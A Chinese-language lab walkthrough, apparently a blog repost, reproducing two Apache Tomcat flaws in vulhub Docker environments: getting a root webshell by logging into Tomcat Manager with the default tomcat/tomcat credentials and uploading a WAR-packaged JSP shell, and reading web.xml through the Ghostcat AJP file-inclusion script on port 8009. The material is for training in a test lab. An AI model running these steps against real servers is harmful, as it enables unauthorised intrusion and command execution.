Apache Tomcat漏洞复现

文章目录

  • 弱口令
    • 启动环境
    • 漏洞复现
  • 本地文件包含
    • 启动环境
    • 漏洞复现

弱口令

启动环境

来到vulhub/tomcat/tomcat8/靶场

cd vulhub/tomcat/tomcat8/

安装环境并启动:

sudo docker-compose up -d && sudo docker-compose up -d

修改端口后启动:

sudo docker-compose -f docker-compose.me.yml up -d

在这里插入图片描述

打开环境:

在这里插入图片描述

漏洞复现

点击Tomcat主页的manager APP登录,这里有弱口令漏洞,输入用户名Tomcat密码Tomcat即可登录成功:

在这里插入图片描述

登录后可以上传war文件,在这里上传打包成war文件的大马可以getshell:

在这里插入图片描述

到目录下

cd /tools/webshell/jsp

使用命令

cvf jshell.war jshell.jsp

将jshell.jsp文件打包成war文件,上传,上传后生成路径,表示上传成功:

在这里插入图片描述

访问大马文件:

在这里插入图片描述

点击系统命令,在这里执行命令,发现是root用户,相当于获取到了webshell:

在这里插入图片描述

本地文件包含

启动环境

来到vulhub/tomcat/CVE-2020-1938靶场

cd vulhub/tomcat/CVE-2020-1938  

安装环境并启动:

sudo docker-compose up -d && sudo docker-compose up -d

修改端口:

在这里插入图片描述

修改端口后启动:

sudo docker-compose -f docker-compose.me.yml up -d

在浏览器输入10.9.75.45:8085,打开主页:

在这里插入图片描述

漏洞复现

这个主页有一个文件包含漏洞到/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi目录下

cd /tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi

从之前的配置文件看到8009端口开放,执行命令:

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.9.75.45 -p 8009 -f WEB-INF/web.xml

利用文件包含漏洞读取到该网站下的web.xml文件的内容:

在这里插入图片描述文章来源地址https://uudwc.com/A/wozxZ

原文地址:https://blog.csdn.net/m0_56578216/article/details/132746693

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

h
上一篇 2023年09月12日 05:33
自定义Dynamics 365实施和发布业务解决方案 - 7. 报表
下一篇 2023年09月12日 05:33